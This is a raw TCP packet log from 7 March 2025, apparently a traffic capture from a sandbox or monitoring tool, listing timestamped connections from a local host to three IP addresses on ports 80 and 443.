Mar 7, 2025 16:20:50.303600073 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.303606033 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.303639889 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.304446936 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.304498911 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.305641890 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.305964947 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.305970907 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.306082964 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.306864023 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.306919098 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.306924105 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.307035923 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.309645891 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.309720039 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.309756041 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.309756041 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.309762955 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.309928894 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.312300920 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.312360048 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.312366962 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.312452078 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.315063953 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.315140963 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.315156937 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.315277100 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.317639112 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.317702055 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.317709923 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.317816973 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.319930077 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.319979906 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.319998980 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.320131063 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.322289944 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.322340012 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.322350025 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.322619915 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.324428082 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.324548960 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.324557066 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.324628115 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.326642990 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.326697111 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.326705933 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.326752901 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.328850985 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.328912020 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.328934908 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.328943014 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.328979969 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.328990936 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.331023932 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.331253052 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.331276894 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.331396103 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.332820892 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.332886934 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.332895994 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.333013058 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.334896088 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.335530996 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.335536957 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.335627079 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.336865902 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.336944103 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.340946913 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.341006994 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.341021061 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.341061115 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.341732025 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.341784954 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.341792107 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.341830969 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.343583107 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.343650103 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.343667030 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.343873978 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.345190048 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.345256090 CET  443    49691  172.217.16.193  192.168.2.8
Mar 7, 2025 16:20:50.345263958 CET  49691  443    192.168.2.8     172.217.16.193
Mar 7, 2025 16:20:50.345274925 CET  443    49691  172.217.16.193  192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.345427036 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.345427036 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.346898079 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.346954107 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.346968889 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.347021103 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.348541975 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.348607063 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.348624945 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.348802090 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.350449085 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.350539923 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.350548983 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.350711107 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.352049112 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.352336884 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.352344990 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.352392912 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.353801012 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.353857994 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.353864908 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.353930950 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.355406046 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.355473042 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.355490923 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.355537891 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.355544090 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.355567932 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.355575085 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.355585098 CET44349691172.217.16.193192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:50.355597973 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:50.355611086 CET49691443192.168.2.8172.217.16.193
                                                                                                                                                                          Mar 7, 2025 16:20:51.132297039 CET4969280192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:51.137345076 CET8049692132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:51.137455940 CET4969280192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:51.137639999 CET4969280192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:51.142579079 CET8049692132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:51.842865944 CET8049692132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:51.846158028 CET4969280192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:51.851183891 CET8049692132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:52.055900097 CET8049692132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:52.107397079 CET4969280192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:52.372211933 CET49693443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:52.372252941 CET44349693104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:52.372314930 CET49693443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:52.373843908 CET49693443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:52.373856068 CET44349693104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:54.586780071 CET44349693104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:54.586883068 CET49693443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:54.734863043 CET49693443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:54.734883070 CET44349693104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:54.735327959 CET44349693104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:54.764723063 CET49693443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:54.808320999 CET44349693104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:55.184017897 CET44349693104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:55.225970984 CET44349693104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:55.226077080 CET49693443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:55.234643936 CET49693443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:55.240087986 CET4969280192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:55.245110035 CET8049692132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:55.451503038 CET8049692132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:55.453423023 CET49694443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:55.453473091 CET44349694104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:55.453545094 CET49694443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:55.453816891 CET49694443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:55.453829050 CET44349694104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:55.498049021 CET4969280192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:57.632277012 CET44349694104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:57.633935928 CET49694443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:57.633955002 CET44349694104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:58.171629906 CET44349694104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:58.216793060 CET49694443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:58.216808081 CET44349694104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:58.217176914 CET49694443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:58.217268944 CET44349694104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:58.217319965 CET49694443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:58.220383883 CET4969280192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:58.221414089 CET4969580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:58.226460934 CET8049695132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:58.226563931 CET4969580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:58.226629972 CET4969580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:58.231664896 CET8049695132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:58.233613968 CET8049692132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:58.233659983 CET4969280192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:20:58.930313110 CET8049695132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:58.931307077 CET49696443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:58.931349039 CET44349696104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:58.931406975 CET49696443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:58.931663990 CET49696443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:20:58.931675911 CET44349696104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:20:58.982448101 CET4969580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:00.935910940 CET44349696104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:00.936048985 CET49696443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:00.937401056 CET49696443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:00.937417030 CET44349696104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:00.937741041 CET44349696104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:00.939156055 CET49696443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:00.984327078 CET44349696104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:01.488565922 CET44349696104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:01.529386997 CET49696443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:01.529417038 CET44349696104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:01.533627987 CET49696443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:01.533720970 CET44349696104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:01.533785105 CET49696443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:01.536837101 CET4969580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:01.537734985 CET4969780192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:01.542031050 CET8049695132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:01.542140961 CET4969580192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:01.542768955 CET8049697132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:01.542861938 CET4969780192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:01.542932987 CET4969780192.168.2.8132.226.247.73
                                                                                                                                                                          Mar 7, 2025 16:21:01.547930956 CET8049697132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:02.253025055 CET8049697132.226.247.73192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:02.254409075 CET49698443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:02.254457951 CET44349698104.21.80.1192.168.2.8
                                                                                                                                                                          Mar 7, 2025 16:21:02.254525900 CET49698443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:02.254792929 CET49698443192.168.2.8104.21.80.1
                                                                                                                                                                          Mar 7, 2025 16:21:02.254806042 CET44349698104.21.80.1192.168.2.8
Mar 7, 2025 16:21:02.294939995 CET  49697  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:04.438482046 CET  443    49698  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:04.438615084 CET  49698  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:04.440454006 CET  49698  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:04.440468073 CET  443    49698  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:04.440751076 CET  443    49698  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:04.442286015 CET  49698  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:04.488342047 CET  443    49698  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:05.042270899 CET  443    49698  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:05.042351007 CET  443    49698  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:05.042390108 CET  49698  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:05.042807102 CET  49698  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:05.046111107 CET  49697  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:05.047183990 CET  49699  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:05.051810980 CET  80     49697  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:05.051862001 CET  49697  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:05.052226067 CET  80     49699  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:05.052290916 CET  49699  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:05.052367926 CET  49699  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:05.057374954 CET  80     49699  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:05.761809111 CET  80     49699  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:05.763313055 CET  49700  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:05.763360023 CET  443    49700  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:05.763472080 CET  49700  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:05.763736963 CET  49700  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:05.763751030 CET  443    49700  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:05.810612917 CET  49699  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:07.973411083 CET  443    49700  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:07.975301981 CET  49700  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:07.975323915 CET  443    49700  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:08.495656013 CET  443    49700  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:08.532790899 CET  443    49700  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:08.532912970 CET  49700  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:08.533297062 CET  49700  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:08.537719011 CET  49701  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:08.542889118 CET  80     49701  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:08.542998075 CET  49701  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:08.543127060 CET  49701  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:08.548258066 CET  80     49701  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:09.273799896 CET  80     49701  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:09.275434017 CET  49702  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:09.275490046 CET  443    49702  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:09.275569916 CET  49702  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:09.275829077 CET  49702  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:09.275846004 CET  443    49702  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:09.326167107 CET  49701  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:11.438119888 CET  443    49702  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:11.439862013 CET  49702  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:11.439888954 CET  443    49702  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:11.979815006 CET  443    49702  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:12.025126934 CET  443    49702  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:12.025289059 CET  49702  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:12.025669098 CET  49702  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:12.029587030 CET  49701  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:12.030663013 CET  49703  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:12.036077023 CET  80     49701  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:12.036132097 CET  49701  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:12.036530972 CET  80     49703  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:12.036607981 CET  49703  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:12.036703110 CET  49703  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:12.041688919 CET  80     49703  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:12.755656958 CET  80     49703  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:12.757117987 CET  49704  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:12.757162094 CET  443    49704  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:12.757244110 CET  49704  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:12.757471085 CET  49704  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:12.757492065 CET  443    49704  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:12.810595989 CET  49703  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:15.040348053 CET  443    49704  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:15.042181969 CET  49704  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:15.042270899 CET  443    49704  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:15.592714071 CET  443    49704  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:15.631144047 CET  443    49704  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:15.631289005 CET  49704  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:15.631957054 CET  49704  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:15.639472008 CET  49703  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:15.640551090 CET  49705  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:15.644963026 CET  80     49703  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:15.645042896 CET  49703  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:15.645579100 CET  80     49705  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:15.645644903 CET  49705  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:15.645728111 CET  49705  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:15.650693893 CET  80     49705  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:16.371177912 CET  80     49705  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:16.373804092 CET  49706  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:16.373847961 CET  443    49706  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:16.374066114 CET  49706  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:16.374433994 CET  49706  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:16.374445915 CET  443    49706  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:16.420027018 CET  49705  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:18.400126934 CET  443    49706  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:18.401789904 CET  49706  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:18.401823044 CET  443    49706  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:18.982769012 CET  443    49706  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:18.985551119 CET  443    49706  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:18.985630035 CET  49706  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:18.986140966 CET  49706  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:18.990122080 CET  49705  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:18.991092920 CET  49707  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:18.995568991 CET  80     49705  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:18.995660067 CET  49705  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:18.996140957 CET  80     49707  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:18.996325016 CET  49707  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:18.996409893 CET  49707  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:19.002094984 CET  80     49707  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:19.715512991 CET  80     49707  132.226.247.73   192.168.2.8
Mar 7, 2025 16:21:19.736429930 CET  49708  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:19.736491919 CET  443    49708  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:19.736601114 CET  49708  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:19.740844965 CET  49708  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:19.740865946 CET  443    49708  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:19.763731956 CET  49707  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:22.209135056 CET  443    49708  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:22.210711956 CET  49708  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:22.210760117 CET  443    49708  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:22.728657961 CET  443    49708  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:22.775266886 CET  443    49708  104.21.80.1      192.168.2.8
Mar 7, 2025 16:21:22.775352001 CET  49708  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:22.775706053 CET  49708  443    192.168.2.8      104.21.80.1
Mar 7, 2025 16:21:22.804600000 CET  49707  80     192.168.2.8      132.226.247.73
Mar 7, 2025 16:21:22.809864998 CET  80     49707  132.226.247.73   192.168.2.8
